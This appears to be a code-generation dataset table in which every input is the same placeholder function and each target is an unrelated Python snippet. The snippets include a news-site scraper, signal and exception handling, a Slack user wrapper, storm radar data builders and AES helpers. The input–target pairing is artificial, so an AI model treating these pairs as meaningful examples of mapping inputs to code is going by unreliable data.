input
stringlengths
11
7.65k
target
stringlengths
22
8.26k
def prefix(self): return True
def initDriver(self): if self.driver is None: self.driver = self.getDriver()
def prefix(self): return True
def quitDriver(self): self.driver.quit() self.driver = None
def prefix(self): return True
def runSpider(self, lstSubcommand=None): strSubcommand = lstSubcommand[0] strArg1 = None if len(lstSubcommand) == 2: strArg1 = lstSubcommand[1] self.initDriver() #init selenium driver self.dicSubCommandHandler[strSubcommand](strArg1) self.quitDriver() #quit selenium driver
def prefix(self): return True
def downloadIndexPage(self, uselessArg1=None): logging.info("download index page") strIndexHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE" if not os.path.exists(strIndexHtmlFolderPath): os.mkdir(strIndexHtmlFolderPath) #mkdir source_html/TECHORANGE/ #科技報橘首頁 self.driver.get("https://buzzorange.com/techorange/") #儲存 html strIndexHtmlFilePath = strIndexHtmlFolderPath + u"\\index.html" self.utility.overwriteSaveAs(strFilePath=strIndexHtmlFilePath, unicodeData=self.driver.page_source)
def prefix(self): return True
def downloadTagPag(self, uselessArg1=None): logging.info("download tag page") strTagHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE\\tag" if not os.path.exists(strTagHtmlFolderPath): os.mkdir(strTagHtmlFolderPath) #mkdir source_html/TECHORANGE/tag/ strTagWebsiteDomain = self.strWebsiteDomain + u"/tag" #取得 Db 中尚未下載的 Tag 名稱 lstStrNotObtainedTagName = self.db.fetchallNotObtainedTagName() for strNotObtainedTagName in lstStrNotObtainedTagName: #略過名稱太長的 tag if len(strNotObtainedTagName) > 60: continue strTagUrl = strTagWebsiteDomain + u"/" + strNotObtainedTagName #tag 第0頁 intPageNum = 0 time.sleep(random.randint(2,5)) #sleep random time self.driver.get(strTagUrl) #儲存 html strTagHtmlFilePath = strTagHtmlFolderPath + u"\\%d_%s_tag.html"%(intPageNum, strNotObtainedTagName) self.utility.overwriteSaveAs(strFilePath=strTagHtmlFilePath, unicodeData=self.driver.page_source) #tag 下一頁 elesNextPageA = self.driver.find_elements_by_css_selector("div.nav-links a.next.page-numbers") while len(elesNextPageA) != 0: time.sleep(random.randint(2,5)) #sleep random time intPageNum = intPageNum+1 strTagUrl = elesNextPageA[0].get_attribute("href") self.driver.get(strTagUrl) #儲存 html strTagHtmlFilePath = strTagHtmlFolderPath + u"\\%d_%s_tag.html"%(intPageNum, strNotObtainedTagName) self.utility.overwriteSaveAs(strFilePath=strTagHtmlFilePath, unicodeData=self.driver.page_source) #tag 再下一頁 elesNextPageA = self.driver.find_elements_by_css_selector("div.nav-links a.next.page-numbers") #更新tag DB 為已抓取 (isGot = 1) self.db.updateTagStatusIsGot(strTagName=strNotObtainedTagName) logging.info("got tag %s"%strNotObtainedTagName)
def prefix(self): return True
def limitStrLessThen128Char(self, strStr=None): if len(strStr) > 128: logging.info("limit str less then 128 char") return strStr[:127] + u"_" else: return strStr
def prefix(self): return True
def downloadNewsPage(self, strTagName=None): if strTagName is None: #未指定 tag lstStrObtainedTagName = self.db.fetchallCompletedObtainedTagName() for strObtainedTagName in lstStrObtainedTagName: self.downloadNewsPageWithGivenTagName(strTagName=strObtainedTagName) else: #有指定 tag 名稱 self.downloadNewsPageWithGivenTagName(strTagName=strTagName)
def prefix(self): return True
def downloadNewsPageWithGivenTagName(self, strTagName=None): logging.info("download news page with tag %s"%strTagName) strNewsHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE\\news" if not os.path.exists(strNewsHtmlFolderPath): os.mkdir(strNewsHtmlFolderPath) #mkdir source_html/TECHORANGE/news/ #取得 DB 紀錄中,指定 strTagName tag 的 news url lstStrNewsUrl = self.db.fetchallNewsUrlByTagName(strTagName=strTagName) intDownloadedNewsCount = 0#紀錄下載 news 頁面數量 timeStart = time.time() #計時開始時間點 timeEnd = None #計時結束時間點 for strNewsUrl in lstStrNewsUrl: #檢查是否已下載 if not self.db.checkNewsIsGot(strNewsUrl=strNewsUrl): if intDownloadedNewsCount%10 == 0: #計算下載10筆news所需時間 timeEnd = time.time() timeCost = timeEnd - timeStart logging.info("download 10 news cost %f sec"%timeCost) timeStart = timeEnd intDownloadedNewsCount = intDownloadedNewsCount+1 time.sleep(random.randint(2,5)) #sleep random time self.driver.get(strNewsUrl) #儲存 html strNewsName = re.match("^https://buzzorange.com/techorange/[\d]{4}/[\d]{2}/[\d]{2}/(.*)/$", strNewsUrl).group(1) strNewsName = self.limitStrLessThen128Char(strStr=strNewsName) #將名稱縮短小於128字完 strNewsHtmlFilePath = strNewsHtmlFolderPath + u"\\%s_news.html"%strNewsName self.utility.overwriteSaveAs(strFilePath=strNewsHtmlFilePath, unicodeData=self.driver.page_source) #更新news DB 為已抓取 (isGot = 1) self.db.updateNewsStatusIsGot(strNewsUrl=strNewsUrl)
def prefix(self): return True
def write(): try: p = round(weather.pressure(),2) c = light.light() print('{"light": '+str(c)+', "pressure": '+str(p)+' }') except KeyboardInterrupt: pass
def prefix(self): return True
def signal_handler_mapping(self): """A dict mapping (signal number) -> (a method handling the signal).""" # Could use an enum here, but we never end up doing any matching on the specific signal value, # instead just iterating over the registered signals to set handlers, so a dict is probably # better. return { signal.SIGINT: self._handle_sigint_if_enabled, signal.SIGQUIT: self.handle_sigquit, signal.SIGTERM: self.handle_sigterm, }
def prefix(self): return True
def __init__(self): self._ignore_sigint_lock = threading.Lock() self._threads_ignoring_sigint = 0 self._ignoring_sigint_v2_engine = False
def prefix(self): return True
def _check_sigint_gate_is_correct(self): assert ( self._threads_ignoring_sigint >= 0 ), "This should never happen, someone must have modified the counter outside of SignalHandler."
def prefix(self): return True
def _handle_sigint_if_enabled(self, signum, _frame): with self._ignore_sigint_lock: self._check_sigint_gate_is_correct() threads_ignoring_sigint = self._threads_ignoring_sigint ignoring_sigint_v2_engine = self._ignoring_sigint_v2_engine if threads_ignoring_sigint == 0 and not ignoring_sigint_v2_engine: self.handle_sigint(signum, _frame)
def prefix(self): return True
def _toggle_ignoring_sigint_v2_engine(self, toggle: bool): with self._ignore_sigint_lock: self._ignoring_sigint_v2_engine = toggle
def prefix(self): return True
def _ignoring_sigint(self): with self._ignore_sigint_lock: self._check_sigint_gate_is_correct() self._threads_ignoring_sigint += 1 try: yield finally: with self._ignore_sigint_lock: self._threads_ignoring_sigint -= 1 self._check_sigint_gate_is_correct()
def prefix(self): return True
def handle_sigint(self, signum, _frame): raise KeyboardInterrupt("User interrupted execution with control-c!")
def prefix(self): return True
def __init__(self, signum, signame): self.signum = signum self.signame = signame self.traceback_lines = traceback.format_stack() super(SignalHandler.SignalHandledNonLocalExit, self).__init__()
def prefix(self): return True
def handle_sigquit(self, signum, _frame): raise self.SignalHandledNonLocalExit(signum, "SIGQUIT")
def prefix(self): return True
def handle_sigterm(self, signum, _frame): raise self.SignalHandledNonLocalExit(signum, "SIGTERM")
def prefix(self): return True
def __new__(cls, *args, **kwargs): raise TypeError("Instances of {} are not allowed to be constructed!".format(cls.__name__))
def prefix(self): return True
def reset_should_print_backtrace_to_terminal(cls, should_print_backtrace): """Set whether a backtrace gets printed to the terminal error stream on a fatal error. Class state: - Overwrites `cls._should_print_backtrace_to_terminal`. """ cls._should_print_backtrace_to_terminal = should_print_backtrace
def prefix(self): return True
def reset_log_location(cls, new_log_location: str) -> None: """Re-acquire file handles to error logs based in the new location. Class state: - Overwrites `cls._log_dir`, `cls._pid_specific_error_fileobj`, and `cls._shared_error_fileobj`. OS state: - May create a new directory. - Overwrites signal handlers for many fatal and non-fatal signals (but not SIGUSR2). :raises: :class:`ExceptionSink.ExceptionSinkError` if the directory does not exist or is not writable. """ # We could no-op here if the log locations are the same, but there's no reason not to have the # additional safety of re-acquiring file descriptors each time (and erroring out early if the # location is no longer writable). try: safe_mkdir(new_log_location) except Exception as e: raise cls.ExceptionSinkError( "The provided log location path at '{}' is not writable or could not be created: {}.".format( new_log_location, str(e) ), e, ) pid = os.getpid() pid_specific_log_path = cls.exceptions_log_path(for_pid=pid, in_dir=new_log_location) shared_log_path = cls.exceptions_log_path(in_dir=new_log_location) assert pid_specific_log_path != shared_log_path try: pid_specific_error_stream = safe_open(pid_specific_log_path, mode="w") shared_error_stream = safe_open(shared_log_path, mode="a") except Exception as e: raise cls.ExceptionSinkError( "Error opening fatal error log streams for log location '{}': {}".format( new_log_location, str(e) ) ) # NB: mutate process-global state! if faulthandler.is_enabled(): logger.debug("re-enabling faulthandler") # Call Py_CLEAR() on the previous error stream: # https://github.com/vstinner/faulthandler/blob/master/faulthandler.c faulthandler.disable() # Send a stacktrace to this file if interrupted by a fatal error. faulthandler.enable(file=pid_specific_error_stream, all_threads=True) # NB: mutate the class variables! cls._log_dir = new_log_location cls._pid_specific_error_fileobj = pid_specific_error_stream cls._shared_error_fileobj = shared_error_stream
def prefix(self): return True
def _exiter(self) -> Optional[Exiter]: return ExceptionSink.get_global_exiter()
def prefix(self): return True
def get_global_exiter(cls) -> Optional[Exiter]: return cls._exiter
def prefix(self): return True
def exiter_as(cls, new_exiter_fun: Callable[[Optional[Exiter]], Exiter]) -> Iterator[None]: """Temporarily override the global exiter. NB: We don't want to try/finally here, because we want exceptions to propagate with the most recent exiter installed in sys.excepthook. If we wrap this in a try:finally, exceptions will be caught and exiters unset. """ previous_exiter = cls._exiter new_exiter = new_exiter_fun(previous_exiter) cls._reset_exiter(new_exiter) yield cls._reset_exiter(previous_exiter)
def prefix(self): return True
def exiter_as_until_exception( cls, new_exiter_fun: Callable[[Optional[Exiter]], Exiter] ) -> Iterator[None]: """Temporarily override the global exiter, except this will unset it when an exception happens.""" previous_exiter = cls._exiter new_exiter = new_exiter_fun(previous_exiter) try: cls._reset_exiter(new_exiter) yield finally: cls._reset_exiter(previous_exiter)
def prefix(self): return True
def _reset_exiter(cls, exiter: Optional[Exiter]) -> None: """Class state: - Overwrites `cls._exiter`. Python state: - Overwrites sys.excepthook. """ logger.debug(f"overriding the global exiter with {exiter} (from {cls._exiter})") # NB: mutate the class variables! This is done before mutating the exception hook, because the # uncaught exception handler uses cls._exiter to exit. cls._exiter = exiter # NB: mutate process-global state! sys.excepthook = cls._log_unhandled_exception_and_exit
def prefix(self): return True
def reset_interactive_output_stream( cls, interactive_output_stream, override_faulthandler_destination=True ): """Class state: - Overwrites `cls._interactive_output_stream`. OS state: - Overwrites the SIGUSR2 handler. This method registers a SIGUSR2 handler, which permits a non-fatal `kill -31 <pants pid>` for stacktrace retrieval. This is also where the the error message on fatal exit will be printed to. """ try: # NB: mutate process-global state! # This permits a non-fatal `kill -31 <pants pid>` for stacktrace retrieval. if override_faulthandler_destination: faulthandler.register( signal.SIGUSR2, interactive_output_stream, all_threads=True, chain=False ) # NB: mutate the class variables! cls._interactive_output_stream = interactive_output_stream except ValueError: # Warn about "ValueError: IO on closed file" when the stream is closed. cls.log_exception( "Cannot reset interactive_output_stream -- stream (probably stderr) is closed" )
def prefix(self): return True
def exceptions_log_path(cls, for_pid=None, in_dir=None): """Get the path to either the shared or pid-specific fatal errors log file.""" if for_pid is None: intermediate_filename_component = "" else: assert isinstance(for_pid, Pid) intermediate_filename_component = ".{}".format(for_pid) in_dir = in_dir or cls._log_dir return os.path.join( in_dir, ".pids", "exceptions{}.log".format(intermediate_filename_component) )
def prefix(self): return True
def log_exception(cls, msg): """Try to log an error message to this process's error log and the shared error log. NB: Doesn't raise (logs an error instead). """ pid = os.getpid() fatal_error_log_entry = cls._format_exception_message(msg, pid) # We care more about this log than the shared log, so write to it first. try: cls._try_write_with_flush(cls._pid_specific_error_fileobj, fatal_error_log_entry) except Exception as e: logger.error( "Error logging the message '{}' to the pid-specific file handle for {} at pid {}:\n{}".format( msg, cls._log_dir, pid, e ) ) # Write to the shared log. try: # TODO: we should probably guard this against concurrent modification by other pants # subprocesses somehow. cls._try_write_with_flush(cls._shared_error_fileobj, fatal_error_log_entry) except Exception as e: logger.error( "Error logging the message '{}' to the shared file handle for {} at pid {}:\n{}".format( msg, cls._log_dir, pid, e ) )
def prefix(self): return True
def _try_write_with_flush(cls, fileobj, payload): """This method is here so that it can be patched to simulate write errors. This is because mock can't patch primitive objects like file objects. """ fileobj.write(payload) fileobj.flush()
def prefix(self): return True
def reset_signal_handler(cls, signal_handler): """Class state: - Overwrites `cls._signal_handler`. OS state: - Overwrites signal handlers for SIGINT, SIGQUIT, and SIGTERM. NB: This method calls signal.signal(), which will crash if not called from the main thread! :returns: The :class:`SignalHandler` that was previously registered, or None if this is the first time this method was called. """ assert isinstance(signal_handler, SignalHandler) # NB: Modify process-global state! for signum, handler in signal_handler.signal_handler_mapping.items(): signal.signal(signum, handler) # Retry any system calls interrupted by any of the signals we just installed handlers for # (instead of having them raise EINTR). siginterrupt(3) says this is the default behavior on # Linux and OSX. signal.siginterrupt(signum, False) previous_signal_handler = cls._signal_handler # NB: Mutate the class variables! cls._signal_handler = signal_handler return previous_signal_handler
def prefix(self): return True
def trapped_signals(cls, new_signal_handler): """A contextmanager which temporarily overrides signal handling. NB: This method calls signal.signal(), which will crash if not called from the main thread! """ previous_signal_handler = cls.reset_signal_handler(new_signal_handler) try: yield finally: cls.reset_signal_handler(previous_signal_handler)
def prefix(self): return True
def ignoring_sigint(cls): """A contextmanager which disables handling sigint in the current signal handler. This allows threads that are not the main thread to ignore sigint. NB: Only use this if you can't use ExceptionSink.trapped_signals(). Class state: - Toggles `self._ignore_sigint` in `cls._signal_handler`. """ with cls._signal_handler._ignoring_sigint(): yield
def prefix(self): return True
def toggle_ignoring_sigint_v2_engine(cls, toggle: bool) -> None: assert cls._signal_handler is not None cls._signal_handler._toggle_ignoring_sigint_v2_engine(toggle)
def prefix(self): return True
def _iso_timestamp_for_now(cls): return datetime.datetime.now().isoformat()
def prefix(self): return True
def _format_exception_message(cls, msg, pid): return cls._EXCEPTION_LOG_FORMAT.format( timestamp=cls._iso_timestamp_for_now(), process_title=setproctitle.getproctitle(), args=sys.argv, pid=pid, message=msg, )
def prefix(self): return True
def _format_traceback(cls, traceback_lines, should_print_backtrace): if should_print_backtrace: traceback_string = "\n{}".format("".join(traceback_lines)) else: traceback_string = " {}".format(cls._traceback_omitted_default_text) return traceback_string
def prefix(self): return True
def _format_unhandled_exception_log(cls, exc, tb, add_newline, should_print_backtrace): exc_type = type(exc) exception_full_name = "{}.{}".format(exc_type.__module__, exc_type.__name__) exception_message = str(exc) if exc else "(no message)" maybe_newline = "\n" if add_newline else "" return cls._UNHANDLED_EXCEPTION_LOG_FORMAT.format( exception_type=exception_full_name, backtrace=cls._format_traceback( traceback_lines=traceback.format_tb(tb), should_print_backtrace=should_print_backtrace, ), exception_message=exception_message, maybe_newline=maybe_newline, )
def prefix(self): return True
def _exit_with_failure(cls, terminal_msg): timestamp_msg = ( f"timestamp: {cls._iso_timestamp_for_now()}\n" if cls._should_print_backtrace_to_terminal else "" ) details_msg = ( "" if cls._should_print_backtrace_to_terminal else "\n\n(Use --print-exception-stacktrace to see more error details.)" ) terminal_msg = terminal_msg or "<no exit reason provided>" formatted_terminal_msg = cls._EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT.format( timestamp_msg=timestamp_msg, terminal_msg=terminal_msg, details_msg=details_msg ) # Exit with failure, printing a message to the terminal (or whatever the interactive stream is). cls._exiter.exit_and_fail(msg=formatted_terminal_msg, out=cls._interactive_output_stream)
def prefix(self): return True
def _log_unhandled_exception_and_exit( cls, exc_class=None, exc=None, tb=None, add_newline=False ): """A sys.excepthook implementation which logs the error and exits with failure.""" exc_class = exc_class or sys.exc_info()[0] exc = exc or sys.exc_info()[1] tb = tb or sys.exc_info()[2] # This exception was raised by a signal handler with the intent to exit the program. if exc_class == SignalHandler.SignalHandledNonLocalExit: return cls._handle_signal_gracefully(exc.signum, exc.signame, exc.traceback_lines) extra_err_msg = None try: # Always output the unhandled exception details into a log file, including the traceback. exception_log_entry = cls._format_unhandled_exception_log( exc, tb, add_newline, should_print_backtrace=True ) cls.log_exception(exception_log_entry) except Exception as e: extra_err_msg = "Additional error logging unhandled exception {}: {}".format(exc, e) logger.error(extra_err_msg) # Generate an unhandled exception report fit to be printed to the terminal (respecting the # Exiter's should_print_backtrace field). if cls._should_print_backtrace_to_terminal: stderr_printed_error = cls._format_unhandled_exception_log( exc, tb, add_newline, should_print_backtrace=cls._should_print_backtrace_to_terminal ) if extra_err_msg: stderr_printed_error = "{}\n{}".format(stderr_printed_error, extra_err_msg) else: # If the user didn't ask for a backtrace, show a succinct error message without # all the exception-related preamble. A power-user/pants developer can still # get all the preamble info along with the backtrace, but the end user shouldn't # see that boilerplate by default. error_msgs = getattr(exc, "end_user_messages", lambda: [str(exc)])() stderr_printed_error = "\n" + "\n".join(f"ERROR: {msg}" for msg in error_msgs) cls._exit_with_failure(stderr_printed_error)
def prefix(self): return True
def _handle_signal_gracefully(cls, signum, signame, traceback_lines): """Signal handler for non-fatal signals which raises or logs an error and exits with failure.""" # Extract the stack, and format an entry to be written to the exception log. formatted_traceback = cls._format_traceback( traceback_lines=traceback_lines, should_print_backtrace=True ) signal_error_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format( signum=signum, signame=signame, formatted_traceback=formatted_traceback ) # TODO: determine the appropriate signal-safe behavior here (to avoid writing to our file # descriptors re-entrantly, which raises an IOError). # This method catches any exceptions raised within it. cls.log_exception(signal_error_log_entry) # Create a potentially-abbreviated traceback for the terminal or other interactive stream. formatted_traceback_for_terminal = cls._format_traceback( traceback_lines=traceback_lines, should_print_backtrace=cls._should_print_backtrace_to_terminal, ) terminal_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format( signum=signum, signame=signame, formatted_traceback=formatted_traceback_for_terminal ) # Exit, printing the output to the terminal. cls._exit_with_failure(terminal_log_entry)
def prefix(self): return True
def __init__(self, raw_data): self._raw = raw_data
def prefix(self): return True
def __getitem__(self, key): return self._raw[key]
def prefix(self): return True
def display_name(self): """ Find the most appropriate display name for a user: look for a "display_name", then a "real_name", and finally fall back to the always-present "name". """ for k in self._NAME_KEYS: if self._raw.get(k): return self._raw[k] if "profile" in self._raw and self._raw["profile"].get(k): return self._raw["profile"][k] return self._raw["name"]
def prefix(self): return True
def email(self): """ Shortcut property for finding the e-mail address or bot URL. """ if "profile" in self._raw: email = self._raw["profile"].get("email") elif "bot_url" in self._raw: email = self._raw["bot_url"] else: email = None if not email: logging.debug("No email found for %s", self._raw.get("name")) return email
def prefix(self): return True
def image_url(self, pixel_size=None): """ Get the URL for the user icon in the desired pixel size, if it exists. If no size is supplied, give the URL for the full-size image. """ if "profile" not in self._raw: return profile = self._raw["profile"] if (pixel_size): img_key = "image_%s" % pixel_size if img_key in profile: return profile[img_key] return profile[self._DEFAULT_IMAGE_KEY]
def prefix(self): return True
def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest()
def prefix(self): return True
def _read_soundings(sounding_file_name, sounding_field_names, radar_image_dict): """Reads storm-centered soundings and matches w storm-centered radar imgs. :param sounding_file_name: Path to input file (will be read by `soundings.read_soundings`). :param sounding_field_names: See doc for `soundings.read_soundings`. :param radar_image_dict: Dictionary created by `storm_images.read_storm_images`. :return: sounding_dict: Dictionary created by `soundings.read_soundings`. :return: radar_image_dict: Same as input, but excluding storm objects with no sounding. """ print('Reading data from: "{0:s}"...'.format(sounding_file_name)) sounding_dict, _ = soundings.read_soundings( netcdf_file_name=sounding_file_name, field_names_to_keep=sounding_field_names, full_id_strings_to_keep=radar_image_dict[storm_images.FULL_IDS_KEY], init_times_to_keep_unix_sec=radar_image_dict[ storm_images.VALID_TIMES_KEY] ) num_examples_with_soundings = len(sounding_dict[soundings.FULL_IDS_KEY]) if num_examples_with_soundings == 0: return None, None radar_full_id_strings = numpy.array( radar_image_dict[storm_images.FULL_IDS_KEY] ) orig_storm_times_unix_sec = ( radar_image_dict[storm_images.VALID_TIMES_KEY] + 0 ) indices_to_keep = [] for i in range(num_examples_with_soundings): this_index = numpy.where(numpy.logical_and( radar_full_id_strings == sounding_dict[soundings.FULL_IDS_KEY][i], orig_storm_times_unix_sec == sounding_dict[soundings.INITIAL_TIMES_KEY][i] ))[0][0] indices_to_keep.append(this_index) indices_to_keep = numpy.array(indices_to_keep, dtype=int) radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY] = radar_image_dict[ storm_images.STORM_IMAGE_MATRIX_KEY ][indices_to_keep, ...] radar_image_dict[storm_images.FULL_IDS_KEY] = sounding_dict[ soundings.FULL_IDS_KEY ] radar_image_dict[storm_images.VALID_TIMES_KEY] = sounding_dict[ soundings.INITIAL_TIMES_KEY ] return sounding_dict, radar_image_dict
def prefix(self): return True
def chunkstring(s, n): return [ s[i:i+n] for i in xrange(0, len(s), n) ]
def prefix(self): return True
def _create_2d_examples( radar_file_names, full_id_strings, storm_times_unix_sec, target_matrix, sounding_file_name=None, sounding_field_names=None): """Creates 2-D examples for one file time. E = number of desired examples (storm objects) e = number of examples returned T = number of target variables :param radar_file_names: length-C list of paths to storm-centered radar images. Files will be read by `storm_images.read_storm_images`. :param full_id_strings: length-E list with full IDs of storm objects to return. :param storm_times_unix_sec: length-E numpy array with valid times of storm objects to return. :param target_matrix: E-by-T numpy array of target values (integer class labels). :param sounding_file_name: Path to sounding file (will be read by `soundings.read_soundings`). If `sounding_file_name is None`, examples will not include soundings. :param sounding_field_names: See doc for `soundings.read_soundings`. :return: example_dict: Same as input for `write_example_file`, but without key "target_names". """ orig_full_id_strings = copy.deepcopy(full_id_strings) orig_storm_times_unix_sec = storm_times_unix_sec + 0 print('Reading data from: "{0:s}"...'.format(radar_file_names[0])) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=radar_file_names[0], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) if this_radar_image_dict is None: return None if sounding_file_name is None: sounding_matrix = None sounding_field_names = None sounding_heights_m_agl = None else: sounding_dict, this_radar_image_dict = _read_soundings( sounding_file_name=sounding_file_name, sounding_field_names=sounding_field_names, radar_image_dict=this_radar_image_dict) if this_radar_image_dict is None: return None if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0: return None sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY] sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY] sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY] full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY] storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY] these_indices = tracking_utils.find_storm_objects( all_id_strings=orig_full_id_strings, all_times_unix_sec=orig_storm_times_unix_sec, id_strings_to_keep=full_id_strings, times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False) target_matrix = target_matrix[these_indices, :] num_channels = len(radar_file_names) tuple_of_image_matrices = () for j in range(num_channels): if j != 0: print('Reading data from: "{0:s}"...'.format(radar_file_names[j])) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=radar_file_names[j], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) tuple_of_image_matrices += ( this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], ) radar_field_names = [ storm_images.image_file_name_to_field(f) for f in radar_file_names ] radar_heights_m_agl = numpy.array( [storm_images.image_file_name_to_height(f) for f in radar_file_names], dtype=int ) example_dict = { FULL_IDS_KEY: full_id_strings, STORM_TIMES_KEY: storm_times_unix_sec, RADAR_FIELDS_KEY: radar_field_names, RADAR_HEIGHTS_KEY: radar_heights_m_agl, ROTATED_GRIDS_KEY: this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY], ROTATED_GRID_SPACING_KEY: this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY], RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields( tuple_of_image_matrices), TARGET_MATRIX_KEY: target_matrix } if sounding_file_name is not None: example_dict.update({ SOUNDING_FIELDS_KEY: sounding_field_names, SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl, SOUNDING_MATRIX_KEY: sounding_matrix }) return example_dict
def prefix(self): return True
def __init__(self, key): self.bs = 32 self.key = hashlib.sha256(key.encode()).digest()
def prefix(self): return True
def _create_3d_examples( radar_file_name_matrix, full_id_strings, storm_times_unix_sec, target_matrix, sounding_file_name=None, sounding_field_names=None): """Creates 3-D examples for one file time. :param radar_file_name_matrix: numpy array (F_r x H_r) of paths to storm- centered radar images. Files will be read by `storm_images.read_storm_images`. :param full_id_strings: See doc for `_create_2d_examples`. :param storm_times_unix_sec: Same. :param target_matrix: Same. :param sounding_file_name: Same. :param sounding_field_names: Same. :return: example_dict: Same. """ orig_full_id_strings = copy.deepcopy(full_id_strings) orig_storm_times_unix_sec = storm_times_unix_sec + 0 print('Reading data from: "{0:s}"...'.format(radar_file_name_matrix[0, 0])) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=radar_file_name_matrix[0, 0], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) if this_radar_image_dict is None: return None if sounding_file_name is None: sounding_matrix = None sounding_field_names = None sounding_heights_m_agl = None else: sounding_dict, this_radar_image_dict = _read_soundings( sounding_file_name=sounding_file_name, sounding_field_names=sounding_field_names, radar_image_dict=this_radar_image_dict) if this_radar_image_dict is None: return None if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0: return None sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY] sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY] sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY] full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY] storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY] these_indices = tracking_utils.find_storm_objects( all_id_strings=orig_full_id_strings, all_times_unix_sec=orig_storm_times_unix_sec, id_strings_to_keep=full_id_strings, times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False) target_matrix = target_matrix[these_indices, :] num_radar_fields = radar_file_name_matrix.shape[0] num_radar_heights = radar_file_name_matrix.shape[1] tuple_of_4d_image_matrices = () for k in range(num_radar_heights): tuple_of_3d_image_matrices = () for j in range(num_radar_fields): if not j == k == 0: print('Reading data from: "{0:s}"...'.format( radar_file_name_matrix[j, k] )) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=radar_file_name_matrix[j, k], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) tuple_of_3d_image_matrices += ( this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], ) tuple_of_4d_image_matrices += ( dl_utils.stack_radar_fields(tuple_of_3d_image_matrices), ) radar_field_names = [ storm_images.image_file_name_to_field(f) for f in radar_file_name_matrix[:, 0] ] radar_heights_m_agl = numpy.array([ storm_images.image_file_name_to_height(f) for f in radar_file_name_matrix[0, :] ], dtype=int) example_dict = { FULL_IDS_KEY: full_id_strings, STORM_TIMES_KEY: storm_times_unix_sec, RADAR_FIELDS_KEY: radar_field_names, RADAR_HEIGHTS_KEY: radar_heights_m_agl, ROTATED_GRIDS_KEY: this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY], ROTATED_GRID_SPACING_KEY: this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY], RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights( tuple_of_4d_image_matrices), TARGET_MATRIX_KEY: target_matrix } if sounding_file_name is not None: example_dict.update({ SOUNDING_FIELDS_KEY: sounding_field_names, SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl, SOUNDING_MATRIX_KEY: sounding_matrix }) return example_dict
def prefix(self): return True
def encrypt(self, raw): raw = self._pad(raw) iv = Random.new().read(AES.block_size) cipher = AES.new(self.key, AES.MODE_CBC, iv) return iv + cipher.encrypt(raw)
def prefix(self): return True
def _create_2d3d_examples_myrorss( azimuthal_shear_file_names, reflectivity_file_names, full_id_strings, storm_times_unix_sec, target_matrix, sounding_file_name=None, sounding_field_names=None): """Creates hybrid 2D-3D examples for one file time. Fields in 2-D images: low-level and mid-level azimuthal shear Field in 3-D images: reflectivity :param azimuthal_shear_file_names: length-2 list of paths to storm-centered azimuthal-shear images. The first (second) file should be (low) mid-level azimuthal shear. Files will be read by `storm_images.read_storm_images`. :param reflectivity_file_names: length-H list of paths to storm-centered reflectivity images, where H = number of reflectivity heights. Files will be read by `storm_images.read_storm_images`. :param full_id_strings: See doc for `_create_2d_examples`. :param storm_times_unix_sec: Same. :param target_matrix: Same. :param sounding_file_name: Same. :param sounding_field_names: Same. :return: example_dict: Same. """ orig_full_id_strings = copy.deepcopy(full_id_strings) orig_storm_times_unix_sec = storm_times_unix_sec + 0 print('Reading data from: "{0:s}"...'.format(reflectivity_file_names[0])) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=reflectivity_file_names[0], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) if this_radar_image_dict is None: return None if sounding_file_name is None: sounding_matrix = None sounding_field_names = None sounding_heights_m_agl = None else: sounding_dict, this_radar_image_dict = _read_soundings( sounding_file_name=sounding_file_name, sounding_field_names=sounding_field_names, radar_image_dict=this_radar_image_dict) if this_radar_image_dict is None: return None if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0: return None sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY] sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY] sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY] full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY] 